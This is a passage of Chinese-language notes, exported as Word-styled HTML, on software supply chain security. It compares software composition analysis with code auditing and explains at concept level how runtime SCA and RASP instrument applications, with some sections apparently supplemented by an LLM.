Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>使用AST（抽象语法树）分析</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>应用代码审计</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>结合IST（交互式灰盒测试）和DAST（动态应用程序安全测试）等工具</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 这些方法综合应用，可以更</span><span style="font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(255, 0, 0);">准确地识别真正的风险</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">，减少误报，从而降低处理压力，提高供应链安全管理的效率。</span></p><p><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#1E4E79;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">3 </span><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#1E4E79;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">软件组件分析</span><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#1E4E79;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">(SCA)</span><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#1E4E79;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">技术深度解析</span></p><p><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">3.1 SCA</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">技术概述及其局限性分析</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#5B9BD5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">SCA</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#5B9BD5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">是入门工具</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#5B9BD5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">软件成分分析、许可证漏洞风险、软件的代码的开源比例检测</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#5B9BD5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">开源</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#5B9BD5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">SCA</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#5B9BD5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">开源或厂商开放saas产品，有很多局限性，本质上是漏洞库的全面性问题！</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;background:#FF00FF;mso-highlight:#FF00FF;">【思】能提取特征，查询接口，或能买数据，是否就不需要买产品了？</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> </span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">3.2 </span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">源码、二进制、运行时</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">SCA</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">比较</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;"></span>    <o:page></o:page></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">三者共同构成了我们对于软件供应链开源治理的不同的手段，或者是一个技术路径，需要联动</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> </span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">3.3 SCA</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">与代码审计的区别与协同</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">{llm</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">补充</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">}</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. 分析对象:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>SCA主要分析软件中使用的第三方组件和依赖库</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>代码审计主要分析软件的源代码或反汇编代码</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 2. 目的:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>SCA旨在识别和管理第三方组件中的已知漏洞和许可证风险</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>代码审计旨在发现自身代码中的安全漏洞、逻辑错误和性能问题</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 3. 分析方法:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>SCA通常使用自动化工具比对已知漏洞数据库</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>代码审计可能结合自动化工具和人工审查</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 4. 深度:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>SCA相对表层,主要关注组件版本和已知漏洞</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>代码审计更深入,可以发现未知漏洞和特定于应用的问题</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 5. 时机:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>SCA可以在开发早期和持续集成过程中频繁进行</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>代码审计通常在重要的开发阶段或发布前进行</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 6. 技能要求:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>SCA对操作人员的技术要求相对较低</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>代码审计需要更专业的安全知识和编程经验</span>    <o:page></o:page></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 这两种方法通常是互补的,结合使用可以提供更全面的软件安全保障。需要更多信息或详细解释吗?</span></p><p><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#1E4E79;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">4 </span><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#1E4E79;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">运行时应用自我保护</span><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#1E4E79;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">RASP</span><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#1E4E79;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">技术</span><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#1E4E79;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;"></span></p><p><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">4.1 </span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#276296;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">运行时安全原理</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">运行时这个 SCA 是如何实现的啊？</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#3C87CD;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">解释型语言</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. 运行时SCA主要通过字节码插桩技术实现,将检测代码注入到应用程序中。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 2. 对于解释型语言(如Python、Java),需要在解释器层面埋入探针,监控程序运行过程中加载的第三方组件信息。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 3. 通过插桩不仅可以分析组件信息,还可以获取函数调用信息和传递的参数。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 4. 这种方式可以实现对开源组件运行时的资产风险盘点和风险攻击应对。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#3C87CD;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">编译型语言</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">{llm补充}</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">对于编译型语言(如C/C++),运行时SCA的实现方式与解释型语言略有不同:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 1. 二进制插桩:在编译后的二进制文件中插入检测代码。可以使用动态二进制插桩工具(如Pin、DynamoRIO)在程序运行时动态插入检测代码。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 2. 动态链接库劫持:替换或劫持程序使用的动态链接库,在库函数调用时执行额外的检测逻辑。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 3. 内存注入:在目标进程的内存空间中注入检测代码,实现运行时监控。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 4. 系统调用钩子:通过拦截系统调用,监控程序与操作系统的交互,从而分析程序行为。</span>    <o:page></o:page></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 5. 调试器接口:利用操作系统提供的调试器接口,在程序执行过程中进行断点设置和数据收集。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 这些技术允许在编译型语言的程序运行时进行组件信息收集、函数调用监控和行为分析,实现与解释型语言类似的SCA功能。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 需要注意的是,编译型语言的运行时SCA实现通常比解释型语言更复杂,可能会对程序性能造成较大影响,因此在实际应用中需要权衡检测的粒度和性能开销。</span></p><p><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">4.2 </span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">有</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">快速整改能力的</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">RASP</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">方案</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">对于快速修复组件漏洞,RASP(Runtime Application Self-Protection)是一种有效方案。</span></p><p><span style="font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(255, 0, 0);">RASP能够天然形成免疫能力,但对产品要求高,需要插桩和一定的运维能力</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 